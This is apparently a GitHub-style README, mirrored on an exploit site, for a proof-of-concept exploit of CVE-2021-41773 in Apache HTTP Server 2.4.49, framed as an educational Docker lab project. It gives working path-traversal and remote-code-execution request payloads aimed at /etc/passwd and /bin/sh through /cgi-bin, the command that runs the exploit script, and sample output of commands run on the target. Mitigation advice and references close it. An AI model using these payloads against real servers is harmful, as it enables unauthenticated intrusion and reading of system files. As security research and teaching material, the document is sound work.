## https://sploitus.com/exploit?id=3130FD74-6B6E-5B18-91E0-27E97844245A
# CVE-2021-41773 โ Apache HTTP Server 2.4.49 Path Traversal / RCE






> **Educational research project.** All testing was performed in an isolated Docker lab. Do not use against any system you do not own.
---
## Vulnerability Summary
| Field | Detail |
|---|---|
| **CVE ID** | CVE-2021-41773 |
| **Affected Software** | Apache HTTP Server 2.4.49 only |
| **Vulnerability Type** | Path Traversal โ Remote Code Execution |
| **CVSS Score** | 9.8 (Critical) |
| **Disclosed** | October 2021 |
| **Fixed In** | Apache 2.4.51 |
### Root Cause
Apache 2.4.49 fails to correctly normalize URL-encoded path sequences (`%2e%2e`) before applying access control rules. This allows an attacker to traverse outside the web root. When CGI is enabled, pointing the traversal at `/bin/sh` and supplying shell commands via POST body results in unauthenticated Remote Code Execution.
---
## Repository Contents
```
cve-2021-41773-poc/
โโโ Dockerfile # Intentionally vulnerable Apache 2.4.49 lab container
โโโ exploit.py # Python PoC โ uses raw sockets to preserve %2e encoding
โโโ SETUP.md # Step-by-step lab setup guide
โโโ README.md # This file
โโโ report.pdf # Full exploit development report
```
---
## Quick Start
### 1. Build and run the vulnerable container
```bash
docker build -t apache-vuln-2449 .
docker run -d -p 8080:80 --name vuln-apache apache-vuln-2449
```
### 2. Run the exploit
```bash
python3 exploit.py
```
### 3. Expected output
```
==================================================
CVE-2021-41773 PoC โ Lab Use Only
==================================================
[+] Target reachable โ HTTP 200
[*] Path Traversal โ Reading /etc/passwd
[*] Status: 403
[-] Blocked (403) โ server restrictions in place
[*] RCE โ Executing: id
[*] Status: 200
[+] OUTPUT:
uid=1(daemon) gid=1(daemon) groups=1(daemon)
[*] RCE โ Executing: whoami
[*] Status: 200
[+] OUTPUT:
daemon
[*] RCE โ Executing: hostname
[*] Status: 200
[+] OUTPUT:
e4ccca07bee7
```
> See [SETUP.md](SETUP.md) for full setup instructions and troubleshooting.
---
## How the Exploit Works
The `requests` library normalizes `%2e` โ `.` before sending, which breaks the exploit (returns 400). This PoC uses **raw sockets** to send the HTTP request byte-for-byte, preserving the encoded traversal sequence exactly as Apache 2.4.49 needs to receive it.
**Traversal payload:**
```
GET /.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
```
**RCE payload:**
```
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
...
echo Content-Type: text/plain; echo; id
```
Apache fails to decode `%2e%2e` before ACL checks, processes the request, routes it through CGI, and executes the POST body as a shell command.
---
## Mitigation
- **Upgrade** Apache to 2.4.51 or later
- **Disable CGI** unless strictly required
- **Never use** `Require all granted` on `/`
- Apply security patches promptly upon release
---
## References
- [CVE-2021-41773 โ MITRE](https://vulners.com/cve/CVE-2021-41773)
- [Apache Security Advisory](https://httpd.apache.org/security/vulnerabilities_24.html)
- [ExploitDB #50383](https://www.exploit-db.com/exploits/50383)
- [Rapid7 Analysis](https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2021-41773)
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)
---
## Author
**Abdur Rehman Siddiqui**
Exploit Development โ Task 3
---
> This repository is for **educational purposes only**. The author is not responsible for any misuse of this material.